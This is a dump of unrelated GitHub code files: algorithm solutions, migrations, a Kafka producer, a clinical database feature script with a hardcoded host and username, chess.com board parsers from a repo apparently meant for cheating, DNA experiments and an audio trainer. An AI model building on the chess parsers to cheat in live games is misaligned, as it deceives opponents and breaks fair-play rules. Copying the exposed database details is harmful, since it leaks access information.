맞닿은 부분의 눈이 같아야하고 전부다 쌓았을 때 양옆 주사위 눈의 합의 최대값을 구하는 문제이다.\n\n\n주사위 눈은 1-6, 2-4, 3-5가 서로 위아래로 짝지어져있기 때문에 반대편은 자동적으로 따라온다.\n\n나는 주사위 눈을 짝지어서 배열에 저장했다.\n\n전체 주사위를 돌면서 저장한 주사위 눈의 짝에서 값을 찾고 반대쪽을 다음 대상으로 바꿔가면서 반복문을 진행했다.\n\n#\n#\n# 양옆의 숫자중 최대값은 4,5,6중 하나이므로 6,5가 있는지 체크해서 최대값을 구해서 더해나갔다.\n#\n#\n# '''\n#\n#\n#\nfrom sys import stdin\ninput = stdin.readline\n\n\nn = int(input())\n\n\ndices = [[] for _ in range(n)]\nanswer = 0\n\nfor idx in range(n):\n nums = list(map(int, 
input().split()))\n\n dices[idx].append((nums[0], nums[5]))\n dices[idx].append((nums[1], nums[3]))\n dices[idx].append((nums[2], nums[4]))\n\n#[[(2, 4), (3, 6), (1, 5)],\n# [(3, 5), (1, 4), (2, 6)],\n# [(5, 2), (6, 1), (4, 3)],\n# [(1, 5), (3, 2), (6, 4)],\n# [(4, 3), (1, 5), (6, 2)]]\n\n\n\n\n\n\ndef solv():\n for dice in dices[0]:\n for target in dice:\n # print(target)\n select_num(target)\n print(answer)\n\n\n\ndef select_num(target):\n global answer\n total = 0\n\n for idx in range(n):\n for dice in dices[idx]:\n if target in dice:\n if 6 in dice:\n if 5 in dice:\n total += 4\n else:\n total += 5\n else:\n total += 6\n if target == dice[0]:\n target = dice[1] # 그 다음 번호 확인 하려는?!\n break\n\n else:\n target = dice[0] #타켓의 값을 다이스에 첫번째로,,\n break\n answer = max(answer, total)\n\nsolv()\n","repo_name":"joojeehwan/algo_jjh","sub_path":"test_im/baekjoon/2116.py","file_name":"2116.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19581500299","text":"\"\"\"quiz, question, answer tables\n\nRevision ID: 8fed53710991\nRevises: f60ef54bc8fb\nCreate Date: 2023-03-19 13:45:59.115260\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '8fed53710991'\ndown_revision = 'f60ef54bc8fb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('quizzes',\n sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(timezone=True), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('company_id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.Column('description', sa.String(), nullable=True),\n sa.Column('frequency', sa.Integer(), nullable=False),\n sa.Column('created_by', sa.Integer(), nullable=False),\n sa.Column('updated_by', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['company_id'], ['companies.id'], ),\n sa.ForeignKeyConstraint(['created_by'], ['users.id'], ),\n sa.ForeignKeyConstraint(['updated_by'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('company_id', 'name', name='company_name_uc')\n )\n op.create_index(op.f('ix_quizzes_id'), 'quizzes', ['id'], unique=False)\n op.create_table('quiz_questions',\n sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(timezone=True), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('quiz_id', sa.Integer(), nullable=False),\n sa.Column('content', sa.String(), nullable=False),\n sa.ForeignKeyConstraint(['quiz_id'], ['quizzes.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_quiz_questions_id'), 'quiz_questions', ['id'], unique=False)\n op.create_table('quiz_answers',\n sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(timezone=True), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('question_id', sa.Integer(), nullable=False),\n sa.Column('correct', sa.Boolean(), nullable=False),\n sa.Column('content', sa.String(), nullable=False),\n sa.ForeignKeyConstraint(['question_id'], ['quiz_questions.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n 
op.create_index(op.f('ix_quiz_answers_id'), 'quiz_answers', ['id'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_quiz_answers_id'), table_name='quiz_answers')\n op.drop_table('quiz_answers')\n op.drop_index(op.f('ix_quiz_questions_id'), table_name='quiz_questions')\n op.drop_table('quiz_questions')\n op.drop_index(op.f('ix_quizzes_id'), table_name='quizzes')\n op.drop_table('quizzes')\n # ### end Alembic commands ###\n","repo_name":"mys1erious/meduzzen-knowledge-control","sub_path":"alembic/versions/2023-03-19_13-45_quiz_question_answer_tables.py","file_name":"2023-03-19_13-45_quiz_question_answer_tables.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6815343938","text":"import socket\nimport json\nfrom confluent_kafka import Producer\n\nconf = {\n 'bootstrap.servers': \"localhost:9092,localhost:9092\",\n 'client.id': socket.gethostname()\n}\n\nproducer = Producer(conf)\n\n\ndef cbfunction(err, msg):\n if err is not None:\n print(\"Mesaj oluşturulurken bir hata oluştu: %s: %s\" %\n (str(msg), str(err)))\n else:\n print(\"Mesaj oluşturuldu\")\n\n\n# json objesi olarak mesajı oluşturuyoruz\njsonObj = {\n \"message\": \"Sonunda mesajı database'e yollayabiliyoz.\"\n}\n# json objesini json string'e çeviriyoruz.\njsonStr = json.dumps(jsonObj)\n\n# vehicle_topic'e mesajı yolluyoruz.\nproducer.produce(topic=\"vehicle_topic\",\n value=jsonStr,\n callback=cbfunction)\nproducer.poll(1)\n","repo_name":"Akilli-Trafik/PubSub","sub_path":"producer/imageproducer.py","file_name":"imageproducer.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14631997132","text":"from waldur_mastermind.invoices import views\n\n\ndef register_in(router):\n router.register(r'invoices', views.InvoiceViewSet, basename='invoice')\n router.register(\n r'payment-profiles', views.PaymentProfileViewSet, basename='payment-profile',\n )\n router.register(\n r'payments', views.PaymentViewSet, basename='payment',\n )\n","repo_name":"AkmonEnviroment/waldur-mastermind","sub_path":"src/waldur_mastermind/invoices/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"15447392543","text":"#!/usr/bin/env python\n\ndef setup():\n import os, subprocess, datetime\n if os.path.exists(os.path.join(os.getcwd(), \"setup.log\")):\n print(\"'setup.log' exists. 
Rust implementation setup correctly\")\n return\n\n # We can't really setup this successfully, we need a build system like CMake or scons for xplat support\n print(\"Watch for Errors - Requires Cargo and the Rust toolchain\")\n try:\n with open('setup.log', 'w') as logFile:\n logFile.write(\"# This is an autogenerated file made by 'run.py' on {}\\n\".format(datetime.datetime.now()))\n logFile.write(\"# => DO NOT DELETE THIS FILE OR SETUP WILL BE CALLED AGAIN\\n\")\n\n logFile.flush()\n subprocess.run([\"rustc\", \"-V\"], stdout = logFile, stderr = logFile, check=True)\n subprocess.run([\"cargo\", \"-V\"], stdout = logFile, stderr = logFile, check=True)\n subprocess.run([\"cargo\", \"update\",\"-v\"], stdout = logFile, stderr = logFile, check=True)\n logFile.flush()\n\n logFile.write(\"\\n# Setup completed on {}\".format(datetime.datetime.now()))\n #end logFile\n except Exception as e:\n print(e)\n if os.path.exists('setup.log'):\n os.remove('setup.log')\n#end run\n\ndef build():\n import subprocess\n retcode = subprocess.call(['cargo', 'build', '--release'])\n if retcode != 0:\n raise AssertionError(\"Build failed\")\n print(\"Successfully built Rust implementation\")\n#end run\n\ndef run(cmd_args):\n import subprocess\n\n # We won't call 'cargo run' here to avoid the overhead\n process_args = ['./target/release/rust'] + cmd_args\n retcode = subprocess.call(process_args)\n if retcode != 0:\n raise RuntimeError(\"Program run returned non-zero exit code\")\n#end run\n\nif __name__==\"__main__\":\n import sys, os\n \n setup()\n build()\n if os.path.basename(sys.argv[0]) == os.path.basename(__file__):\n run(sys.argv[1:])\n# end main\n ","repo_name":"foxtrotzulu94/LanguageBenchmarkGame","sub_path":"rust/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29583084305","text":"import sys\r\nfrom collections import deque\r\n\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\nmaze = []\r\n\r\nfor _ in range(n):\r\n maze.append(\r\n list(map(int, input().rstrip()))\r\n ) # readline의 경우 맨 뒤에 '\\n'까지 입력받으므로 제거해줘야 함\r\n\r\n# 상하좌우\r\ndx = [-1, 1, 0, 0]\r\ndy = [0, 0, -1, 1]\r\n\r\n\r\ndef bfs(x, y):\r\n q = deque()\r\n q.append((x, y))\r\n\r\n while q:\r\n x, y = q.popleft()\r\n\r\n for i in range(4):\r\n nx = x + dx[i]\r\n ny = y + dy[i]\r\n\r\n if 0 <= nx < n and 0 <= ny < m and maze[nx][ny] == 1:\r\n q.append((nx, ny))\r\n maze[nx][ny] = maze[x][y] + 1\r\n return maze[n - 1][m - 1]\r\n\r\n\r\nprint(bfs(0, 0))\r\n\r\n## bfs로 지나가는길을 전에 지나온길 +1을 해준다\r\n","repo_name":"jeonbar2/Coding_Test","sub_path":"백준/Silver/2178. 
미로 탐색/미로 탐색.py","file_name":"미로 탐색.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19905596967","text":"import os\nimport sys\nimport time\nimport numpy as np\nimport pandas as pd\nfrom backports import tempfile\nfrom multiprocessing import Pool\nos.chdir('/home/ec2-user/healthrex/CDSS/medinfo/dataconversion')\nfrom medinfo.dataconversion import FeatureMatrixFactory as fmf\nfrom medinfo.dataconversion import FeatureMatrix as fm\nos.chdir('/home/ec2-user/cs230/scripts/matrix/icu2')\nimport psycopg2\nfrom datetime import timedelta\n\n# Code to connect to database:\n\ndsn_pwd = input(\"Enter the database password: \")\ndef connectToDB(dsn_pwd):\n '''\n Connects to Database, requires password\n '''\n\n dsn_database = \"medinfo\"\n dsn_hostname = \"healthrex-db.cwyfvxgvic6c.us-east-1.rds.amazonaws.com\"\n dsn_port = \"5432\"\n dsn_uid = \"jonc101\"\n\n\n try:\n conn_string = \"host='\"+dsn_hostname+\"' port=\"+dsn_port+\" dbname='\"+dsn_database+\"' user='\"+dsn_uid+\"' password='\"+dsn_pwd+\"'\"\n print(\"Connecting to database\\n ->%s\" % (conn_string))\n conn=psycopg2.connect(conn_string)\n print(\"Connected!\\n\")\n\n except:\n print(\"Unable to connect to the database.\")\n\n cursor = conn.cursor()\n return cursor\n\ncursor = connectToDB(dsn_pwd) # Establish the connection to the database\n\n\n# Select clinical items we want to pre-process\ncursor.execute(\"\"\"SELECT DISTINCT(name) FROM clinical_item WHERE analysis_status = 1\"\"\")\nclinical_item_names = []\nfor elem in cursor:\n clinical_item_names.append(elem[0])\n\n# Get total count of all the patient items we want\ncursor.execute(\"SELECT COUNT(*) FROM patient_item where NOT (encounter_id IS NULL)\")\ntotal_count = int(cursor.fetchall()[0][0])\n\n# Query in batches of batch_size\nbatch_size = 100000\nnum_iterations = total_count/batch_size + 1\noutputdir = os.getcwd()\n\n# The query and pre-processing for each batch\ndef queryItems(i):\n global batch_size\n global clinical_item_names\n global dsn_pwd\n global outputdir\n start_time = time.time()\n offset = batch_size*i\n print('Iteration : {} (Batch size: {}; Offset: {})'.format(str(i), str(batch_size), str(offset)))\n\n data = None\n with tempfile.TemporaryDirectory() as path:\n os.chdir(path)\n cursor = connectToDB(dsn_pwd)\n cursor.execute(\"SELECT * from patient_item where NOT (encounter_id IS NULL) order by encounter_id DESC LIMIT %s OFFSET %s\", (str(batch_size), str(offset)))\n\n # Initialize FeatureMatrix\n factory = fm.FeatureMatrix(variable = 'hi', num_data_points=100000000, params=None)\n\n # Add features\n factory._factory.setPatientEpisodeInput(cursor)\n factory._factory.processPatientEpisodeInput()\n factory._add_features(index_time_col='item_date')\n factory._factory.addClinicalItemFeatures(['Death'], dayBins=[1,7,30], features=\"post\")\n\n # Add relevant clinical item features\n for item in clinical_item_names:\n print(item)\n factory._factory.addClinicalItemFeatures(clinicalItemNames=[item], dayBins=[1,7,30], features=\"all\")\n\n # Output the feature matrix for this iteration\n factory._factory.buildFeatureMatrix(matrixFileName=outputdir+\"/FINAL_iteration_{}.txt\".format(str(i)))\n end_time = time.time()\n \n print('Completed Iteration : {} in time : {}'.format(str(i), str(end_time-start_time)))\n return 0\n\n# Do multiprocessing of the batches\n\npool = Pool(14)\niterations = list(range(0, num_iterations))\npool.map(queryItems, iterations, 
chunksize=1)\n\n","repo_name":"HealthRex/CDSS","sub_path":"scripts/Archive/DeepLearningRecommender/makeMatrix.py","file_name":"makeMatrix.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"2"} +{"seq_id":"15750068655","text":"from . import IParser\nfrom chessboard import Chessboard, Pieces, Square\nfrom game import Moves\nimport lxml.html as html\nimport re\nfrom lxml.etree import ParserError\n\n\nclass ChessComMovesOnlineParser(IParser):\n @staticmethod\n def parsable(data):\n if type(data) == str:\n try:\n root = html.fromstring(data)\n elements = root.xpath(\".//span[contains(@class, 'move-text-component')]\")\n if len(elements) > 0:\n return True\n except (KeyError, ParserError):\n pass\n return False\n\n @staticmethod\n def parse(data):\n\n root = html.fromstring(data)\n elements = root.xpath(\".//span[contains(@class, 'move-text-component')]/text()\")\n\n moves = list()\n\n for e in elements:\n e = e.strip()\n if e != '':\n moves.append(e)\n\n return Moves(moves)\n\n\nclass ChessComMovesOfflineParser(IParser):\n @staticmethod\n def parsable(data):\n if type(data) == str:\n try:\n root = html.fromstring(data)\n elements = root.xpath(\".//a[contains(@class, 'gotomove')]\")\n if len(elements) > 0:\n return True\n elements = root.xpath(\".//span[contains(@class, 'gotomove')]\")\n\n except (KeyError, ParserError):\n pass\n return False\n\n @staticmethod\n def parse(data):\n\n root = html.fromstring(data)\n elements = root.xpath(\".//a[contains(@class, 'gotomove')]/text()\")\n\n moves = list()\n\n for e in elements:\n e = e.strip()\n if e != '':\n moves.append(e)\n\n return Moves(moves)\n\n\nclass ChessComBoardOnlineParser(IParser):\n\n @staticmethod\n def parsable(data):\n if type(data) == str:\n try:\n root = html.fromstring(data)\n root.get_element_by_id(\"game-board\")\n return True\n except (KeyError, ParserError):\n pass\n return False\n\n @staticmethod\n def parse(data):\n def _url_to_piece(url: str):\n line = url.split('/')[-1]\n line = re.sub(r'\\.\\S+', '', line)\n return Pieces.get(line[1], True if line[0] == 'w' else False)\n\n chessboard = Chessboard()\n pattern_url = re.compile(r'url\\(\"([^)]+)\"\\)')\n pattern_square = re.compile(\"square-(\\d+)\")\n root = html.fromstring(data)\n element = root.get_element_by_id(\"game-board\")\n pieces_element = element.find_class('pieces')[0]\n\n squares, pieces = list(), list()\n\n for p in pieces_element:\n coords = pattern_square.search(p.get('class')).group(1)\n style = p.get('style')\n url = pattern_url.search(style).group(1)\n square = Square.index_to_square(int(coords[-2:]) - 1, int(coords[:2]) - 1)\n piece = _url_to_piece(url)\n squares.append(square)\n pieces.append(piece)\n\n chessboard.update_squares(squares, pieces)\n\n return chessboard\n\n\nclass ChessComBoardOfflineParser(IParser):\n\n @staticmethod\n def parsable(data):\n if type(data) == str:\n root = html.fromstring(data)\n try:\n element = root.get_element_by_id(\"chessboard_boardarea\")\n classes = element.find_class('chess_com_piece')\n\n for cls in classes:\n if 'dragging' in cls.get('class'):\n return False\n return True\n except (KeyError, ParserError):\n pass\n return False\n\n @staticmethod\n def parse(data):\n def _url_to_piece(url: str):\n line = url.split('/')[-1]\n line = re.sub(r'\\.\\S+', '', line)\n return Pieces.get(line[1], True if line[0] == 'w' else False)\n\n def _get_translation(line):\n translate_match = pattern.search(line)\n if translate_match is not None:\n 
x = int(translate_match.group(1))\n y = int(translate_match.group(2))\n return x, y\n\n else:\n return -1, -1\n\n chessboard = Chessboard()\n pattern = re.compile(r'translate\\((\\d+)px,\\s*(\\d+)px\\)')\n\n root = html.fromstring(data)\n element = root.get_element_by_id(\"chessboard_boardarea\")\n classes = element.find_class('chess_com_piece')\n\n squares, pieces = list(), list()\n\n for cls in classes:\n w = int(cls.get('width'))\n h = int(cls.get('height'))\n style = cls.get('style')\n src = cls.get('src')\n x, y = _get_translation(style)\n if x == -1 or y == -1:\n return None\n row, col = 7 - y / h, x / w\n if not row.is_integer() or not col.is_integer():\n return None\n square = Square.index_to_square(int(row), int(col))\n piece = _url_to_piece(src)\n\n squares.append(square)\n pieces.append(piece)\n\n chessboard.update_squares(squares, pieces)\n\n return chessboard\n","repo_name":"RafalStaszak/ChessCheat","sub_path":"parsing/chesscom.py","file_name":"chesscom.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4775409520","text":"import sys\n\nN, Y = map(int, input().split())\n\nmax_man = Y // 10000\n\nfor i in range(max_man+1):\n max_gosen = (Y - 10000*i) // 5000\n for j in range(max_gosen+1):\n# print(\"i\", i)\n# print(\"j\", j)\n if 10000 * i + 5000 * j + 1000 * (N-i-j) == Y:\n print(i, j, N-i-j)\n sys.exit()\n\nprint(-1, -1, -1)\n","repo_name":"yudaiOfRiver/atcoder","sub_path":"85/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3208035288","text":"import string\nimport random\nimport re\nimport math\nimport os\nimport subprocess\nimport time\nimport sys\n######### Settings of the experiments #############\nalphabet = ['A', 'C', 'G', 'T']\n# Each file contains the (randomly generated) sequences of a given length (from 'text_size'); The number of sequences decided by 'num_seq_in_file' .\n# Each sequence of the specified length will have copies equal to size of 'k' (Here45).\n# Each copy will have randomly distributed elastic-degenerate symbols equal to the given value from alpha.\n# Each sybol will have a randomly chosen collection from the alphabet\n#text_size = [1000, 2000, 4000, 8000, 16000, 32000, 64000]\n#pattern_size = [8, 16, 32, 64]\n#alpha = [10, 20, 40, 80] \ntext_size = [10, 100]\npattern_size = [4,8]\nalpha = [10]\ndeg_symb = 10 # in percent\nmax_len_in_els = 10 \nnum_sets = 2\nparam_separator = '\\t'\n###################################################\n\nFOLDER = './experiments/'\nDATA_FOLDER = 'data/'\nINPUT_FILE_NAME = 'input'\nPATTERN_FILE_NAME = 'pattern'\nOUTPUT_FILE_NAME = 'output'\nSTATS_FILE_NAME = 'stats.txt'\n\nstats_param = ['m', 'n', 'time']\n\n###################################################\n# stats dictionary: rows= seq_size, columns = pattern_size\nstats_dct = [[0,0],[0,0]]\n\n\ndef memory_usage_resource():\n import resource\n rusage_denom = 1024.\n if sys.platform == 'darwin':\n # OSX produces the output in different units\n rusage_denom = rusage_denom * rusage_denom\n mem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom\n return mem\n\n\ndef collect_stats_old(o_file, stats_file):\n n = []\n d = []\n tm = []\n block_size = 5\n with open(o_file, \"r\") as f:\n mode = 0\n # 1st line seq name, next time, next n & k , next LPF array, next blank\n for line in f:\n if (mode == 0 or mode == 3 or mode == 4):\n 
# Ignore line \n dummy = line\n elif (mode ==1):\n tmf = re.findall(\"\\d+\\.\\d+\", line)\n tm.append(str(tmf[0]))\n else:\n seq_len, sd = line.split(' ')\n n.append(seq_len)\n d.append(sd)\n mode = (mode + 1) % block_size\n #num = num_seq_in_file * len(k)\n num=0\n for ind in range(num):\n stats_file.write(str(n[ind]) + param_separator + str(alpha[ind]) +\n param_separator + tm[ind] + '\\n')\n\ndef collect_stats(o_file):\n with open(o_file, \"r\") as f:\n # first line num of patterns ; ignore\n f.readline()\n\n # next line time\n line = f.readline()\n tmf = re.findall(\"\\d+\\.\\d+\", line)\n return str(tmf[0]) \n\n\n\ndef write_file(seq_file, seq_size, seq, a):\n d = seq_size / 10\n symb_pos = random.sample(range(seq_size), d)\n symb_pos_sorted = sorted(symb_pos)\n symb_pos_sorted.append(seq_size)\n nxt = 0\n \n #seq_file.write('>seq ' + str(seq_size) + '_' + str(a) + '\\n')\n for ind in range(seq_size):\n if ind != symb_pos_sorted[nxt]:\n seq_file.write(seq[ind])\n else:\n empty_included = False\n sym_size = random.randint(2, a)\n seq_file.write('{')\n alleles = []\n for i in range(sym_size):\n allele_len = random.randint(0, max_len_in_els)\n allele = ''.join(random.choice(alphabet) for i in range(allele_len))\n if allele == '':\n if empty_included:\n i = i-1\n else:\n empty_included = True # first empty string included\n allele = 'E'\n alleles.append(allele)\n else:\n alleles.append(allele)\n symb = ','.join(alleles)\n seq_file.write(symb)\n seq_file.write('}')\n nxt += 1\n \n seq_file.write('\\n\\n')\n\n\ndef onse_set(set_num):\n i_filename = FOLDER + DATA_FOLDER + str(set_num) + '/' + INPUT_FILE_NAME\n p_filename = FOLDER + DATA_FOLDER + str(set_num) + '/' + PATTERN_FILE_NAME\n o_filename = FOLDER + DATA_FOLDER + str(set_num) + '/' + OUTPUT_FILE_NAME\n \n\n # Generate Pattern Files\n #num_pat = len(pattern_size)\n for p_len in pattern_size:\n psuff = '.p' + str(p_len) + '.txt'\n pat_filename = p_filename + psuff\n pat_file = open(pat_filename, 'w')\n pattern = ''.join(random.choice(alphabet) for i in range(p_len))\n pat_file.write(pattern + '\\n\\n')\n pat_file.close()\n print(\"$$$$$$$$$$$$$$$$$$$$ PATTERN FILE GENERATION COMPLETE $$$$$$$$$$$$$$$$$$$$$$\")\n\n # Generate Data Files\n num_files = len(text_size)\n for i in range(num_files):\n seq_size = text_size[i]\n seq = ''.join(random.choice(alphabet) for i in range(seq_size))\n for a in alpha:\n print(\"====== WRITING INPUT FILE ===== \" + str(i))\n suff = '.n' + str(seq_size) + '.a' + str(a) + '.txt'\n seq_filename = i_filename + suff\n seq_file = open(seq_filename, 'w') \n write_file(seq_file, seq_size, seq, a)\n seq_file.close()\n \n print(\"$$$$$$$$$$$$$$$$$$$$ INPUT FILE GENERATION COMPLETE $$$$$$$$$$$$$$$$$$$$$$\")\n\n # Run the tool on the files\n for p_len in pattern_size:\n psuff = '.p' + str(p_len)\n pat_filename = p_filename + psuff + '.txt'\n \n for seq_size in text_size:\n for a in alpha:\n print(\"====== RUNNING PATTERN-INPUT FILE ===== \" + str(p_len) + ' : ' + str(seq_size))\n suff = '.n' + str(seq_size) + '.a' + str(a)\n seq_filename = i_filename + suff + '.txt'\n outsuff = suff + psuff\n out_filename = o_filename + outsuff + '.txt'\n # Call the tool\n tool = './bin/eldes'\n cmd = tool + ' -a DNA -t ' + seq_filename + ' -p ' + pat_filename + ' -o ' + out_filename\n print('COMMAND: ' + cmd)\n comp = subprocess.Popen(cmd, shell=True)\n comp.wait()\n\n print(\"$$$$$$$$$$$$$$$$$$$$ FILE PROCESSING COMPLETE $$$$$$$$$$$$$$$$$$$$$$\")\n\n # Analyse the output files\n for j in range(len(pattern_size)):\n p_len = 
pattern_size[j]\n psuff = '.p' + str(p_len)\n for i in range(len(text_size)):\n seq_size = text_size[i]\n for a in alpha:\n suff = '.n' + str(seq_size) + '.a' + str(a)\n outsuff = suff + psuff\n out_filename = o_filename + outsuff + '.txt'\n tm = float(collect_stats(out_filename))\n stats_dct[i][j] += tm\n \n\n\ndef main():\n for i in range(num_sets):\n cmd = 'mkdir ' + FOLDER + DATA_FOLDER + str(i+1)\n comp = subprocess.Popen(cmd, shell=True)\n comp.wait()\n\n for i in range(num_sets):\n print('********************************************* SET Number '+ str(i) +' ************************************' )\n onse_set(i+1)\n print('************************ done\\n')\n\n sf = open(FOLDER + STATS_FILE_NAME+'.stats', 'w') \n sf.write(param_separator.join(stats_param))\n # Analyse the output files\n for j in range(len(pattern_size)):\n p_len = pattern_size[j]\n sf.write('\\n')\n for i in range(len(text_size)): \n seq_size = text_size[i]\n stats = str(p_len) + param_separator + str(seq_size) + param_separator \n tm = stats_dct[i][j]\n tm = tm/num_sets\n stats += str(tm)\n sf.write(stats)\n sf.write('\\n')\n sf.close()\n\nmain()\n","repo_name":"Ritu-Kundu/ElDeS","sub_path":"scripts/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":7680,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"40730541223","text":"from collections import defaultdict\nfrom sklearn.metrics import label_ranking_average_precision_score\nimport torch\nfrom torch.nn import functional as F\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom sklearn.preprocessing import minmax_scale\n\nimport utils\n\nplt.switch_backend('agg')\n\n\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\ndef apply_wd(model, gamma):\n for name, tensor in model.named_parameters():\n if 'bias' in name:\n continue\n tensor.data.add_(-gamma * tensor.data)\n\n\ndef grad_norm(model):\n grad = 0.0\n count = 0\n for name, tensor in model.named_parameters():\n if tensor.grad is not None:\n grad += torch.sqrt(torch.sum((tensor.grad.data) ** 2))\n count += 1\n return grad.cpu().numpy() / count\n\n#____________\n# mixup function\ndef mixup_data(x, y, alpha=1.0, use_cuda=True):\n '''Returns mixed inputs, pairs of targets, and lambda'''\n if alpha > 0:\n lam = np.random.beta(alpha, alpha)\n else:\n lam = 1\n\n indices = torch.randperm(x.size()[0])\n x2 = x[indices]\n y2 = y[indices]\n \n mixed_x = lam * x + (1 - lam) * x2\n mixed_y = lam * y + (1 - lam) * y2\n return mixed_x, mixed_y, lam\n\nfrom torch.autograd import Variable\n\n#____________\n\nclass Trainer:\n global_step = 0\n\n def __init__(self, train_writer=None, eval_writer=None, compute_grads=True, device=None):\n if device is None:\n if torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n self.device = device\n self.train_writer = train_writer\n self.eval_writer = eval_writer\n self.compute_grads = compute_grads\n\n def train_epoch(self, model, optimizer, scheduler, dataloader, lr, log_prefix=\"\"):\n device = self.device\n \n alpha = 0.1 # add mixup ration parameter\n \n model = model.to(device)\n model.train()\n for param_group in optimizer.param_groups:\n param_group['lr'] = scheduler.get_lr()[0] #lr\n\n for batch in tqdm(dataloader):\n x = batch['logmel'].to(device)\n y = batch['labels'].to(device)\n \n optimizer.zero_grad()\n #out = model(x)\n \n # mixup\n inputs, targets, lam = mixup_data(x, y, alpha)\n inputs, targets = 
map(Variable, (inputs, targets))\n out = model(inputs)\n \n out1 = torch.tensor(minmax_scale(out.reshape(-1).cpu().detach().numpy(), (0.00001,0.99999)))\n t1 = torch.tensor(minmax_scale(targets.reshape(-1).cpu().detach().numpy(), (0.00001,0.99999)))\n out1, t1 = map(Variable, (out1, t1))\n \n l_1 = F.binary_cross_entropy(out1, t1)\n loss = F.binary_cross_entropy_with_logits(out, targets) + l_1\n \n loss.backward()\n optimizer.step()\n\n probs = torch.sigmoid(out).cpu().data.numpy()\n lrap = label_ranking_average_precision_score(batch['labels'], probs)\n\n log_entry = dict(\n lrap=lrap,\n loss=loss.item(),\n lr=scheduler.get_lr()[0],\n )\n if self.compute_grads:\n log_entry['grad_norm'] = grad_norm(model)\n\n for name, value in log_entry.items():\n if log_prefix != '':\n name = log_prefix + '/' + name\n self.train_writer.add_scalar(name, value, global_step=self.global_step)\n self.global_step += 1\n\n def eval_epoch(self, model, dataloader, log_prefix=\"\"):\n if torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n\n model = model.to(device)\n model.eval()\n metrics = defaultdict(list)\n lwlrap = utils.lwlrap_accumulator()\n for batch in tqdm(dataloader):\n with torch.no_grad():\n x = batch['logmel'].to(device)\n y = batch['labels'].to(device)\n out = model(x)\n loss = F.binary_cross_entropy_with_logits(out, y)\n probs = torch.sigmoid(out).cpu().data.numpy()\n lrap = label_ranking_average_precision_score(batch['labels'], probs)\n lwlrap.accumulate_samples(batch['labels'], probs)\n\n metrics['loss'].append(loss.item())\n metrics['lrap'].append(lrap)\n\n metrics = {key: np.mean(values) for key, values in metrics.items()}\n metrics['lwlrap'] = lwlrap.overall_lwlrap()\n for name, value in metrics.items():\n if log_prefix != '':\n name = log_prefix + '/' + name\n self.eval_writer.add_scalar(name, value, global_step=self.global_step)\n\n fig = plt.figure(figsize=(12, 9))\n z = lwlrap.per_class_lwlrap() * lwlrap.per_class_weight()\n plt.bar(np.arange(len(z)), z)\n plt.hlines(np.mean(z), 0, len(z), linestyles='dashed')\n plt.ylim([0, 0.013])\n plt.xlim([-1, 80])\n plt.grid()\n self.eval_writer.add_figure('per_class_weighted_lwlrap', fig, global_step=self.global_step)\n\n fig = plt.figure(figsize=(12, 9))\n z = lwlrap.per_class_lwlrap()\n plt.bar(np.arange(len(z)), z)\n plt.hlines(np.mean(z), 0, len(z), linestyles='dashed')\n plt.xlim([-1, 80])\n plt.grid()\n self.eval_writer.add_figure('per_class_lwlrap', fig, global_step=self.global_step)\n\n return metrics\n","repo_name":"krDaria/dl_project_fat2019","sub_path":"scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21401992766","text":"import os\nfrom 